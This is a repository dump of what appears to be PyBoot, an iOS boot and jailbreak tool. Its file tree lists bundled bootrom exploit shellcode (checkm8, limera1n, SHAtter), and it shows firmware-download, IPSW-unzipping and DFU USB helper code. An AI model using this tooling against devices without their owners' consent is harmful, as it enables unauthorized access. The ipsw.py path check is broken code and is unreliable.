├── .gitignore
├── LICENSE
├── README.md
├── pyboot.py
├── requirements.txt
└── resources
├── __init__.py
├── bin
├── Kernel64Patcher
├── dtree_patcher
├── eclipsa7000
├── eclipsa7001
├── eclipsa8000
├── eclipsa8003
├── iBoot64Patcher
├── iPwnder32
├── ibootim
├── img4
├── img4tool
├── irecovery
├── kairos
├── pzb
└── tsschecker
├── bootlogo.png
├── img4.py
├── iospythontools
├── __init__.py
├── iphonewiki.py
├── ipswapi.py
├── manifest.py
├── requirements.txt
└── utils.py
├── ipsw.py
├── ipwndfu
├── .gitignore
├── __init__.py
├── bin
│ ├── 0x8015.bin
│ ├── 24Kpwn-shellcode.bin
│ ├── SHAtter-shellcode.bin
│ ├── alloc8-shellcode.bin
│ ├── checkm8_arm64.bin
│ ├── checkm8_armv7.bin
│ ├── ibss-flash-nor-shellcode.bin
│ ├── limera1n-shellcode.bin
│ ├── steaks4uce-shellcode.bin
│ ├── t8010_t8011_disable_wxn_arm64.bin
│ ├── usb_0xA1_2_arm64.bin
│ └── usb_0xA1_2_armv7.bin
├── checkm8.py
├── device_platform.py
├── device_platform2.py
├── dfu.py
├── dfu2.py
├── libusbfinder
│ ├── __init__.py
│ └── bottles
│ │ ├── libusb-1.0.19.mountain_lion.bottle.1.tar.gz
│ │ ├── libusb-1.0.20.mavericks.bottle.1.tar.gz
│ │ ├── libusb-1.0.21.yosemite.bottle.tar.gz
│ │ ├── libusb-1.0.22.el_capitan.bottle.tar.gz
│ │ ├── libusb-1.0.22.high_sierra.bottle.tar.gz
│ │ ├── libusb-1.0.22.mojave.bottle.tar.gz
│ │ └── libusb-1.0.22.sierra.bottle.tar.gz
├── rmsigchks.py
├── usb
│ ├── ACKNOWLEDGEMENTS
│ ├── LICENSE
│ ├── README.rst
│ ├── __init__.py
│ ├── _debug.py
│ ├── _interop.py
│ ├── _lookup.py
│ ├── _objfinalizer.py
│ ├── backend
│ │ ├── __init__.py
│ │ ├── libusb0.py
│ │ ├── libusb1.py
│ │ └── openusb.py
│ ├── control.py
│ ├── core.py
│ ├── legacy.py
│ ├── libloader.py
│ └── util.py
├── usbexec.py
├── usbexec2.py
└── utilities.py
├── ipwndfu8010
├── .gitignore
├── JAILBREAK-GUIDE.md
├── LICENSE
├── Makefile
├── README.md
├── SHAtter.py
├── aes-keys
│ └── S5L8920-firmware
├── alloc8.py
├── bin
│ ├── 24Kpwn-shellcode.bin
│ ├── SHAtter-shellcode.bin
│ ├── alloc8-shellcode.bin
│ ├── checkm8_arm64.bin
│ ├── checkm8_armv7.bin
│ ├── ibss-flash-nor-shellcode.bin
│ ├── limera1n-shellcode.bin
│ ├── steaks4uce-shellcode.bin
│ ├── t8010_t8011_disable_wxn_arm64.bin
│ ├── usb_0xA1_2_arm64.bin
│ └── usb_0xA1_2_armv7.bin
├── checkm8.py
├── device_platform.py
├── dfu.py
├── dfuexec.py
├── ibootpatcher
├── image3.py
├── image3_24Kpwn.py
├── ipwndfu
├── ipwnrecovery
├── libusbfinder
│ ├── __init__.py
│ └── bottles
│ │ ├── libusb-1.0.19.mountain_lion.bottle.1.tar.gz
│ │ ├── libusb-1.0.20.mavericks.bottle.1.tar.gz
│ │ ├── libusb-1.0.21.yosemite.bottle.tar.gz
│ │ ├── libusb-1.0.22.el_capitan.bottle.tar.gz
│ │ ├── libusb-1.0.22.high_sierra.bottle.tar.gz
│ │ ├── libusb-1.0.22.mojave.bottle.tar.gz
│ │ └── libusb-1.0.22.sierra.bottle.tar.gz
├── limera1n.py
├── nor-backups
│ └── README
├── nor.py
├── recovery.py
├── repo
│ └── ipwndfu.png
├── rmsigchks.py
├── src
│ ├── 24Kpwn-shellcode.S
│ ├── SHAtter-shellcode.S
│ ├── alloc8-shellcode.S
│ ├── checkm8_arm64.S
│ ├── checkm8_armv7.S
│ ├── ibss-flash-nor-shellcode.S
│ ├── limera1n-shellcode.S
│ ├── steaks4uce-shellcode.S
│ ├── t8010_t8011_disable_wxn_arm64.S
│ ├── usb_0xA1_2_arm64.S
│ └── usb_0xA1_2_armv7.S
├── steaks4uce.py
├── usb
│ ├── ACKNOWLEDGEMENTS
│ ├── LICENSE
│ ├── README.rst
│ ├── __init__.py
│ ├── _debug.py
│ ├── _interop.py
│ ├── _lookup.py
│ ├── _objfinalizer.py
│ ├── backend
│ │ ├── __init__.py
│ │ ├── libusb0.py
│ │ ├── libusb1.py
│ │ └── openusb.py
│ ├── control.py
│ ├── core.py
│ ├── legacy.py
│ ├── libloader.py
│ └── util.py
├── usbexec.py
└── utilities.py
├── ipwndfuKeys
├── .gitignore
├── JAILBREAK-GUIDE.md
├── LICENSE
├── Makefile
├── README.md
├── SHAtter.py
├── aes-keys
│ └── S5L8920-firmware
├── alloc8.py
├── bin
│ ├── 24Kpwn-shellcode.bin
│ ├── SHAtter-shellcode.bin
│ ├── alloc8-shellcode.bin
│ ├── checkm8_arm64.bin
│ ├── checkm8_armv7.bin
│ ├── checkm8_nopaddingcorruption_arm64.bin
│ ├── ibss-flash-nor-shellcode.bin
│ ├── limera1n-shellcode.bin
│ ├── steaks4uce-shellcode.bin
│ ├── t8010_t8011_disable_wxn_arm64.bin
│ ├── t8015_shellcode_arm64.bin
│ ├── usb_0xA1_2_arm64.bin
│ └── usb_0xA1_2_armv7.bin
├── checkm8.py
├── device_platform.py
├── dfu.py
├── dfuexec.py
├── ibootpatcher
├── image3.py
├── image3_24Kpwn.py
├── ipwndfu
├── ipwnrecovery
├── libusbfinder
│ ├── __init__.py
│ └── bottles
│ │ ├── libusb-1.0.19.mountain_lion.bottle.1.tar.gz
│ │ ├── libusb-1.0.20.mavericks.bottle.1.tar.gz
│ │ ├── libusb-1.0.21.yosemite.bottle.tar.gz
│ │ ├── libusb-1.0.22.el_capitan.bottle.tar.gz
│ │ ├── libusb-1.0.22.high_sierra.bottle.tar.gz
│ │ ├── libusb-1.0.22.mojave.bottle.tar.gz
│ │ └── libusb-1.0.22.sierra.bottle.tar.gz
├── limera1n.py
├── nor-backups
│ └── README
├── nor.py
├── recovery.py
├── repo
│ └── ipwndfu.png
├── src
│ ├── 24Kpwn-shellcode.S
│ ├── SHAtter-shellcode.S
│ ├── alloc8-shellcode.S
│ ├── checkm8_arm64.S
│ ├── checkm8_armv7.S
│ ├── checkm8_nopaddingcorruption_arm64.S
│ ├── ibss-flash-nor-shellcode.S
│ ├── limera1n-shellcode.S
│ ├── steaks4uce-shellcode.S
│ ├── t8010_t8011_disable_wxn_arm64.S
│ ├── t8015_shellcode_arm64.S
│ ├── usb_0xA1_2_arm64.S
│ └── usb_0xA1_2_armv7.S
├── steaks4uce.py
├── usb
│ ├── ACKNOWLEDGEMENTS
│ ├── LICENSE
│ ├── README.rst
│ ├── __init__.py
│ ├── _debug.py
│ ├── _interop.py
│ ├── _lookup.py
│ ├── _objfinalizer.py
│ ├── backend
│ │ ├── __init__.py
│ │ ├── libusb0.py
│ │ ├── libusb1.py
│ │ └── openusb.py
│ ├── control.py
│ ├── core.py
│ ├── legacy.py
│ ├── libloader.py
│ └── util.py
├── usbexec.py
└── utilities.py
├── ipwndfuX
├── .gitignore
├── JAILBREAK-GUIDE.md
├── LICENSE
├── Makefile
├── README.md
├── SHAtter.py
├── aes-keys
│ └── S5L8920-firmware
├── alloc8.py
├── bin
│ ├── 0x8015.bin
│ ├── 24Kpwn-shellcode.bin
│ ├── SHAtter-shellcode.bin
│ ├── alloc8-shellcode.bin
│ ├── checkm8_arm64.bin
│ ├── checkm8_armv7.bin
│ ├── ibss-flash-nor-shellcode.bin
│ ├── limera1n-shellcode.bin
│ ├── steaks4uce-shellcode.bin
│ ├── t8010_t8011_disable_wxn_arm64.bin
│ ├── t8015_shellcode_arm64.bin
│ ├── usb_0xA1_2_arm64.bin
│ └── usb_0xA1_2_armv7.bin
├── checkm8.py
├── device_platform.py
├── dfu.py
├── dfuexec.py
├── ibootpatcher
├── image3.py
├── image3_24Kpwn.py
├── ipwndfu
├── ipwnrecovery
├── libusbfinder
│ ├── __init__.py
│ └── bottles
│ │ ├── libusb-1.0.19.mountain_lion.bottle.1.tar.gz
│ │ ├── libusb-1.0.20.mavericks.bottle.1.tar.gz
│ │ ├── libusb-1.0.21.yosemite.bottle.tar.gz
│ │ ├── libusb-1.0.22.el_capitan.bottle.tar.gz
│ │ ├── libusb-1.0.22.high_sierra.bottle.tar.gz
│ │ ├── libusb-1.0.22.mojave.bottle.tar.gz
│ │ └── libusb-1.0.22.sierra.bottle.tar.gz
├── limera1n.py
├── nor-backups
│ └── README
├── nor.py
├── recovery.py
├── repo
│ └── ipwndfu.png
├── src
│ ├── 0x8015.S
│ ├── 24Kpwn-shellcode.S
│ ├── SHAtter-shellcode.S
│ ├── alloc8-shellcode.S
│ ├── checkm8_arm64.S
│ ├── checkm8_armv7.S
│ ├── ibss-flash-nor-shellcode.S
│ ├── limera1n-shellcode.S
│ ├── steaks4uce-shellcode.S
│ ├── t8010_t8011_disable_wxn_arm64.S
│ ├── t8015_shellcode_arm64.S
│ ├── usb_0xA1_2_arm64.S
│ └── usb_0xA1_2_armv7.S
├── steaks4uce.py
├── usb
│ ├── ACKNOWLEDGEMENTS
│ ├── LICENSE
│ ├── README.rst
│ ├── __init__.py
│ ├── _debug.py
│ ├── _interop.py
│ ├── _lookup.py
│ ├── _objfinalizer.py
│ ├── backend
│ │ ├── __init__.py
│ │ ├── libusb0.py
│ │ ├── libusb1.py
│ │ └── openusb.py
│ ├── control.py
│ ├── core.py
│ ├── legacy.py
│ ├── libloader.py
│ └── util.py
├── usbexec.py
└── utilities.py
├── kc.bpatch
└── pwn.py
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 | *.json
3 | *.pyc
4 | *.im4p
5 | *.img4
6 | *.shsh
7 | *.shsh2
8 | *.patched
9 | *.raw
10 | *.pwn
11 | .irecovery
12 | IPSW/
13 | SSH/
14 | venv
15 | *.dmg
16 | resources/manifest.plist
17 | *.lock
18 | resources/bootlogo.ibootim
19 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | astroid==2.3.3
2 | autopep8==1.5
3 | beautifulsoup4==4.8.2
4 | bs4==0.0.1
5 | certifi==2019.11.28
6 | chardet==3.0.4
7 | idna==2.8
8 | isort==4.3.21
9 | lazy-object-proxy==1.4.3
10 | mccabe==0.6.1
11 | pycodestyle==2.5.0
12 | pycparser==2.19
13 | pylint==2.4.4
14 | pyusb==1.0.2
15 | remotezip==0.9.2
16 | requests==2.22.0
17 | six==1.14.0
18 | soupsieve==2.0
19 | tabulate==0.8.6
20 | typed-ast==1.4.1
21 | urllib3==1.26.5
22 | wrapt==1.11.2
23 |
--------------------------------------------------------------------------------
/resources/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/__init__.py
--------------------------------------------------------------------------------
/resources/bin/Kernel64Patcher:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/Kernel64Patcher
--------------------------------------------------------------------------------
/resources/bin/dtree_patcher:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/dtree_patcher
--------------------------------------------------------------------------------
/resources/bin/eclipsa7000:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/eclipsa7000
--------------------------------------------------------------------------------
/resources/bin/eclipsa7001:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/eclipsa7001
--------------------------------------------------------------------------------
/resources/bin/eclipsa8000:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/eclipsa8000
--------------------------------------------------------------------------------
/resources/bin/eclipsa8003:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/eclipsa8003
--------------------------------------------------------------------------------
/resources/bin/iBoot64Patcher:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/iBoot64Patcher
--------------------------------------------------------------------------------
/resources/bin/iPwnder32:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/iPwnder32
--------------------------------------------------------------------------------
/resources/bin/ibootim:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/ibootim
--------------------------------------------------------------------------------
/resources/bin/img4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/img4
--------------------------------------------------------------------------------
/resources/bin/img4tool:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/img4tool
--------------------------------------------------------------------------------
/resources/bin/irecovery:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/irecovery
--------------------------------------------------------------------------------
/resources/bin/kairos:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/kairos
--------------------------------------------------------------------------------
/resources/bin/pzb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/pzb
--------------------------------------------------------------------------------
/resources/bin/tsschecker:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/tsschecker
--------------------------------------------------------------------------------
/resources/bootlogo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bootlogo.png
--------------------------------------------------------------------------------
/resources/iospythontools/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/iospythontools/__init__.py
--------------------------------------------------------------------------------
/resources/iospythontools/manifest.py:
--------------------------------------------------------------------------------
1 | import json
2 | import os
3 | import re
4 |
5 | from remotezip import RemoteZip
6 |
7 | from resources.iospythontools.ipswapi import APIParser
8 |
9 |
10 | class Manifest(object): # TODO Add OTA compatibility
11 | def __init__(self, device, version):
12 | super().__init__()
13 | self.device = device
14 | self.version = version
15 |
16 | def downloadBuildManifest(self):
17 | shit = APIParser(self.device, self.version)
18 | buildid = shit.iOSToBuildid()
19 | shit.linksForDevice('ipsw')
20 |
21 | with open(f'{self.device}.json', 'r') as file:
22 | data = json.load(file)
23 | i = 0
24 | buildidFromJsonFile = data['firmwares'][i]['buildid']
25 | while buildidFromJsonFile != buildid:
26 | i += 1
27 | buildidFromJsonFile = data['firmwares'][i]['buildid']
28 |
29 | url = data['firmwares'][i]['url']
30 | manifest = 'BuildManifest.plist'
31 |
32 | # Start the process of reading and extracting a file from a url
33 |
34 | #print(f'Downloading manifest for {self.version}, {buildid}')
35 | zip = RemoteZip(url)
36 | zip.extract(manifest)
37 | # This can be done better
38 | os.rename(manifest, f'BuildManifest_{self.device}_{self.version}_{buildid}.plist')
39 | #print('Done downloading!')
40 | zip.close()
41 |
42 | file.close()
43 |
44 | def manifestParser(self):
45 | oof = APIParser(self.device, self.version)
46 | buildid = oof.iOSToBuildid()
47 | manifest = f'BuildManifest_{self.device}_{self.version}_{buildid}.plist'
48 |
49 | if not os.path.exists(manifest):
50 | self.downloadBuildManifest()
51 |
52 | with open(manifest, 'r') as f:
53 | data = f.read().replace('\t', '').splitlines()
54 | f.close()
55 | return data
56 |
57 | def getCodename(self):
58 | api = APIParser(self.device, self.version)
59 | buildid = api.iOSToBuildid()
60 | manifest = f'BuildManifest_{self.device}_{self.version}_{buildid}.plist'
61 | data = self.manifestParser()
62 | control = data.index('BuildTrain')
63 | index = control + 1
64 | codename = re.sub('<[^>]*>', '', data[index]) # Cheeky HTML tag removal :D
65 | os.remove(manifest)
66 | return codename
67 |
68 | def getBasebandVersion(self):
69 | data = self.manifestParser()
70 | control = data.index('BasebandFirmware') # 33, wrong, need the second (not particularly bad)
71 | print(control)
72 |
--------------------------------------------------------------------------------
/resources/iospythontools/requirements.txt:
--------------------------------------------------------------------------------
1 | astroid==2.3.3
2 | autopep8==1.4.4
3 | beautifulsoup4==4.8.1
4 | bs4==0.0.1
5 | certifi==2019.11.28
6 | chardet==3.0.4
7 | device-detector==0.9
8 | idna==2.8
9 | isort==4.3.21
10 | lazy-object-proxy==1.4.3
11 | mccabe==0.6.1
12 | pycodestyle==2.5.0
13 | pylint==2.4.4
14 | PyYAML==5.4
15 | regex==2019.12.9
16 | remotezip==0.9.2
17 | requests==2.22.0
18 | six==1.13.0
19 | soupsieve==1.9.5
20 | tabulate==0.8.6
21 | typed-ast==1.4.0
22 | urllib3==1.26.5
23 | wrapt==1.11.2
24 |
--------------------------------------------------------------------------------
/resources/iospythontools/utils.py:
--------------------------------------------------------------------------------
1 | import json
2 | import os
3 | import sys
4 | import time
5 | from math import floor
6 | from urllib.parse import urlsplit
7 | from urllib.request import urlopen
8 |
9 | from remotezip import RemoteZip
10 |
11 | """
12 |
13 | All of the helper functions or just a module to store other functions
14 | that don't have a particular module that its similar to.
15 |
16 | Basically just 'tools'.
17 |
18 | """
19 |
20 | # Maybe convert progress into my own custom file downloader that auto grabs the data such as filesize, duration, etc.
21 |
22 |
23 | def progress(count, block_size, total_size): # Check README for credit (not mine)
24 | global start_time
25 | if count == 0:
26 | start_time = time.time()
27 | return
28 | duration = time.time() - start_time
29 | progress_size = int(count * block_size)
30 | speed = int(progress_size / (1024 * duration))
31 | percent = int(count * block_size * 100 / total_size)
32 | sys.stdout.write(f'\r{percent}%, {floor(progress_size / (1024 * 1024))} MB, {speed} KB/s, {floor(duration)} seconds passed')
33 | sys.stdout.flush()
34 |
35 |
36 | def downloadJSONData(url, filename):
37 | request = urlopen(url).read()
38 | convert = json.loads(request)
39 | with open(f'{filename}.json', 'w') as file:
40 | json.dump(convert, file, indent=4)
41 | file.close()
42 |
43 |
44 | def splitToFileName(path):
45 | split = urlsplit(path)
46 | filename = split.path.split('/')[-1]
47 | return filename
48 |
49 |
50 | def splitKbag(kbag):
51 | if len(kbag) != 96:
52 | sys.exit('String provided is not 96 bytes! The length read was:', len(kbag))
53 | else:
54 | iv = kbag[:32]
55 | key = kbag[-64:]
56 | return f'IV: {iv} Key: {key}'
57 |
58 |
59 | def clean():
60 | for file in os.listdir(os.getcwd()):
61 | if file.endswith('json'):
62 | os.remove(file)
63 |
--------------------------------------------------------------------------------
/resources/ipsw.py:
--------------------------------------------------------------------------------
1 | import plistlib
2 | import sys
3 | import os
4 | import shutil
5 | from zipfile import ZipFile, is_zipfile
6 |
7 | def readmanifest(path, flag):
8 | fn = path
9 | with open(fn, 'rb') as f:
10 | pl = plistlib.load(f)
11 |
12 | if flag:
13 | result = pl['ProductVersion']
14 | else:
15 | supportedModels = str(pl['SupportedProductTypes'])
16 | supportedModels1 = supportedModels.replace("[", "")
17 | supportedModels2 = supportedModels1.replace("'", "")
18 | result = supportedModels2.replace("]", "")
19 |
20 | return result
21 |
22 | def unzipIPSW(path):
23 | if is_zipfile(path): # First of all, check to see if fname is an actual ipsw, by verifying the file is a zip archive (ipsw's are just zip files).
24 | print(f'{path} is a zip archive!')
25 | else:
26 | sys.exit(f'"{path}" is not a zip archive! Are you sure you inserted the correct ipsw path?')
27 |
28 | print("Starting IPSW unzipping")
29 | outputFolder = "IPSW"
30 | newpath = path.rstrip()
31 | fname = str(newpath)
32 | testFile = os.path.exists(fname)
33 |
34 | if os.path.exists('IPSW'):
35 | shutil.rmtree('IPSW')
36 | os.mkdir('IPSW')
37 | elif not os.path.exists('IPSW'):
38 | os.mkdir('IPSW')
39 |
40 | while not testFile or not fname.endswith!=(".ipsw"):
41 | print("Invalid filepath/filename.\nPlease try again with a valid filepath/filename.")
42 | fname = input("Enter the path to the IPSW file (Or drag and drop the IPSW into this window):\n")
43 | newpath = fname.rstrip()
44 | fname = str(newpath)
45 | testFile = os.path.exists(fname)
46 |
47 | if testFile and fname.endswith(".ipsw"):
48 |
49 | print("IPSW found at given path...")
50 | print("Cleaning up old files...")
51 | shutil.rmtree("IPSW")
52 | print("Unzipping..")
53 |
54 | with ZipFile(fname, 'r') as zip_ref:
55 | zip_ref.extractall(outputFolder)
56 | source = ("IPSW/Firmware/dfu/")
57 | dest1 = os.getcwd()
58 |
59 | files = os.listdir(source)
60 |
61 | for f in files:
62 | shutil.move(source + f, dest1 + "/IPSW/")
63 |
--------------------------------------------------------------------------------
/resources/ipwndfu/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | nor-backups/nor-*
3 | libusbfinder/libusb-*
4 | SecureROM-*
5 | n88ap-iBSS-4.3.5.img3
6 | *.ipsw
7 | .*.swp
8 |
--------------------------------------------------------------------------------
/resources/ipwndfu/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/__init__.py
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/0x8015.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/0x8015.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/24Kpwn-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/24Kpwn-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/SHAtter-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/SHAtter-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/alloc8-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/alloc8-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/checkm8_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/checkm8_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/checkm8_armv7.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/checkm8_armv7.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/ibss-flash-nor-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/ibss-flash-nor-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/limera1n-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/limera1n-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/steaks4uce-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/steaks4uce-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/t8010_t8011_disable_wxn_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/t8010_t8011_disable_wxn_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/usb_0xA1_2_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/usb_0xA1_2_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/usb_0xA1_2_armv7.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/usb_0xA1_2_armv7.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/dfu.py:
--------------------------------------------------------------------------------
1 | import sys, time
2 | import usb # pyusb: use 'pip install pyusb' to install this module
3 | import usb.backend.libusb1
4 | from resources.ipwndfu import libusbfinder
5 | #try:
6 | #from resources.ipwndfu import libusbfinder
7 | #except ImportError:
8 | #import libusbfinder
9 |
10 | MAX_PACKET_SIZE = 0x800
11 |
12 | def acquire_device(timeout=30.0, match=None, fatal=True):
13 | backend = usb.backend.libusb1.get_backend(find_library=lambda x:libusbfinder.libusb1_path())
14 | #print('Acquiring device handle.')
15 | # Keep retrying for up to timeout seconds if device is not found.
16 | start = time.time()
17 | once = False
18 | while not once or time.time() - start < timeout:
19 | once = True
20 | for device in usb.core.find(find_all=True, idVendor=0x5AC, idProduct=0x1227, backend=backend):
21 | if match is not None and match not in device.serial_number:
22 | continue
23 | usb.util.claim_interface(device, 0)
24 | return device
25 | time.sleep(0.001)
26 | if fatal:
27 | print('ERROR: No Apple device in DFU Mode 0x1227 detected after %0.2f second timeout. Exiting.' % timeout)
28 | print("Place the device into DFU mode again and re-run Vieux")
29 | sys.exit(1)
30 | return None
31 |
32 | def release_device(device):
33 | #print('Releasing device handle.')
34 | usb.util.dispose_resources(device)
35 |
36 | def reset_counters(device):
37 | #print('Resetting USB counters.')
38 | assert device.ctrl_transfer(0x21, 4, 0, 0, 0, 1000) == 0
39 |
40 | def usb_reset(device):
41 | #print('Performing USB port reset.')
42 | try:
43 | device.reset()
44 | except usb.core.USBError:
45 | # OK: doesn't happen on Yosemite but happens on El Capitan and Sierra
46 | #print('Caught exception during port reset; should still work.')
47 | pass
48 |
49 | def send_data(device, data):
50 | #print('Sending 0x%x of data to device.' % len(data))
51 | index = 0
52 | while index < len(data):
53 | amount = min(len(data) - index, MAX_PACKET_SIZE)
54 | assert device.ctrl_transfer(0x21, 1, 0, 0, data[index:index + amount], 5000) == amount
55 | index += amount
56 |
57 | def get_data(device, amount):
58 | #print('Getting 0x%x of data from device.' % amount)
59 | data = str()
60 | while amount > 0:
61 | part = min(amount, MAX_PACKET_SIZE)
62 | ret = device.ctrl_transfer(0xA1, 2, 0, 0, part, 5000)
63 | assert len(ret) == part
64 | data += ret.tostring()
65 | amount -= part
66 | return data
67 |
68 | def request_image_validation(device):
69 | #print('Requesting image validation.')
70 | assert device.ctrl_transfer(0x21, 1, 0, 0, '', 1000) == 0
71 | device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
72 | device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
73 | device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
74 | usb_reset(device)
75 |
--------------------------------------------------------------------------------
/resources/ipwndfu/dfu2.py:
--------------------------------------------------------------------------------
1 | import sys, time
2 | import usb # pyusb: use 'pip install pyusb' to install this module
3 | import usb.backend.libusb1
4 | import libusbfinder
5 |
6 | MAX_PACKET_SIZE = 0x800
7 |
8 | def acquire_device(timeout=5.0, match=None, fatal=True):
9 | backend = usb.backend.libusb1.get_backend(find_library=lambda x:libusbfinder.libusb1_path())
10 | #print 'Acquiring device handle.'
11 | # Keep retrying for up to timeout seconds if device is not found.
12 | start = time.time()
13 | once = False
14 | while not once or time.time() - start < timeout:
15 | once = True
16 | for device in usb.core.find(find_all=True, idVendor=0x5AC, idProduct=0x1227, backend=backend):
17 | if match is not None and match not in device.serial_number:
18 | continue
19 | return device
20 | time.sleep(0.001)
21 | if fatal:
22 | print 'ERROR: No Apple device in DFU Mode 0x1227 detected after %0.2f second timeout. Exiting.' % timeout
23 | sys.exit(1)
24 | return None
25 |
26 | def release_device(device):
27 | #print 'Releasing device handle.'
28 | usb.util.dispose_resources(device)
29 |
30 | def reset_counters(device):
31 | #print 'Resetting USB counters.'
32 | assert device.ctrl_transfer(0x21, 4, 0, 0, 0, 1000) == 0
33 |
34 | def usb_reset(device):
35 | #print 'Performing USB port reset.'
36 | try:
37 | device.reset()
38 | except usb.core.USBError:
39 | # OK: doesn't happen on Yosemite but happens on El Capitan and Sierra
40 | pass
41 | #print 'Caught exception during port reset; should still work.'
42 |
43 | def send_data(device, data):
44 | #print 'Sending 0x%x of data to device.' % len(data)
45 | index = 0
46 | while index < len(data):
47 | amount = min(len(data) - index, MAX_PACKET_SIZE)
48 | assert device.ctrl_transfer(0x21, 1, 0, 0, data[index:index + amount], 5000) == amount
49 | index += amount
50 |
51 | def get_data(device, amount):
52 | #print 'Getting 0x%x of data from device.' % amount
53 | data = str()
54 | while amount > 0:
55 | part = min(amount, MAX_PACKET_SIZE)
